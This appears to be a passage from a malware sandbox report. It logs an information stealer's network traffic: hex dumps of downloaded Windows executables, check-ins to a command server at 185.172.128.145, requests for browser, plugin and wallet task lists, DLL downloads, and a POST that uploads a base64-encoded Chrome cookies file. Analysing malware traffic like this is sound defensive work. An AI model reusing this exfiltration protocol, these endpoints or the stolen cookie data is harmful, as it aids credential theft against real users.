00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:06 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:08 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:23:09 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCHost: 185.172.128.145Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 35 44 44 43 44 38 38 46 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="hwid"145DDCD88FF73897250831------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="build"default2------FIIIIJKFCAAECAKFIEHC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHIHost: 185.172.128.145Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 2d 2d 0d 0a Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="message"browsers------DGDHJEGIEBFHDGDGHDHI--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 185.172.128.145Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"plugins------AAEHIDAKECFIEBGDHJEB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.172.128.145Content-Length: 5855Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKHost: 185.172.128.145Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1n
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJHost: 185.172.128.145Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 2d 2d 0d 0a Data Ascii: ------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CBGCBGCAFIIECBFIDHIJContent-Disposition: form-data; name="file"------CBGCBGCAFIIECBFIDHIJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 185.172.128.145Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"d77e24b59ad65d69a0227bc687925ef3e9d3097c2d6e271899f890ab168ee5959bc24ea2------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="file"------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.145Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 185.172.128.145Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFHHost: 185.172.128.145Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 37 65 32 34 62 35 39 61 64 36 35 64 36 39 61 30 32 32 37 62 63 36 38 37 39 32 35 65 66 33 65 39 64 33 30 39 37 63 32 64 36 65 32 37 31 38 39 39 66 38 39 30 61 62 31 36 38 65 65 35 39 35 39 62 63 32 34 65 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 2d 2d 0d 0a Data 